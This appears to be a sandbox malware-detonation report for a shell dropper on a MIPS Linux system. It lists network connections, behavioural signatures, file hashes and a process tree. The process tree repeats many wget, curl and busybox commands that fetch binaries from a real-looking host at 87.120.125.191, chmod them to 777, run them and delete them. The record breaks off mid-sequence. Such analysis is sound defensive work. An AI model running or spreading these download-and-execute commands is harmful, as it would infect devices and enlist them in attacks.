/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/863-1-0xb6721000-0xb6732044-memory.dmp

memory/869-2-0xb6726000-0xb6737044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-20 03:36

Reported

2024-11-20 03:39

Platform

debian9-mipsbe-20240611-en

Max time kernel

85s

Max time network

88s

Command Line

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk N/A
N/A /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 N/A
N/A /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy N/A
N/A /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 N/A
N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg N/A
N/A /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs N/A
N/A /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 N/A
N/A /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ N/A
N/A /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB N/A
N/A /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV N/A
N/A /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL N/A
N/A /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO N/A
N/A /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ N/A
N/A /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy N/A
N/A /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk N/A
N/A /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 N/A
N/A /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 N/A
N/A /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 N/A
N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg N/A
N/A /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs N/A
N/A /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ N/A
N/A /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ N/A
N/A /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB N/A
N/A /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV N/A
N/A /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL N/A
N/A /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /usr/bin/curl N/A
File opened for modification /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /usr/bin/curl N/A
File opened for modification /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /usr/bin/curl N/A
File opened for modification /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /usr/bin/curl N/A
File opened for modification /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /usr/bin/curl N/A
File opened for modification /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /usr/bin/curl N/A
File opened for modification /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /usr/bin/curl N/A
File opened for modification /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /usr/bin/curl N/A
File opened for modification /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /usr/bin/curl N/A
File opened for modification /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /usr/bin/curl N/A
File opened for modification /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /usr/bin/curl N/A
File opened for modification /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /usr/bin/curl N/A
File opened for modification /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /usr/bin/curl N/A
File opened for modification /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /usr/bin/curl N/A
File opened for modification /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /usr/bin/curl N/A
File opened for modification /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /usr/bin/curl N/A
File opened for modification /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /usr/bin/curl N/A
File opened for modification /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /usr/bin/curl N/A
File opened for modification /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /usr/bin/curl N/A
File opened for modification /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /usr/bin/curl N/A
File opened for modification /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /usr/bin/curl N/A
File opened for modification /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /usr/bin/curl N/A
File opened for modification /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /usr/bin/curl N/A
File opened for modification /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /usr/bin/curl N/A
File opened for modification /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /usr/bin/curl N/A
File opened for modification /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /usr/bin/curl N/A
File opened for modification /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /usr/bin/curl N/A
File opened for modification /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /usr/bin/curl N/A

Processes

/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/chmod

[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd

[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/rm

[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/wget

[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/chmod

[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg

[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/rm

[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/wget

[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/chmod

[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs

[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/rm

[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/chmod

[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ

[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/rm

[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/chmod

[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB

[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/rm

[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/wget

[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/chmod

[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV

[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/rm

[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/wget

[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/chmod

[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL

[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/rm

[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/wget

[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/chmod

[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/rm

[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/wget

[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/chmod

[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/rm

[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/chmod

[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd

[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/rm

[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/wget

[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

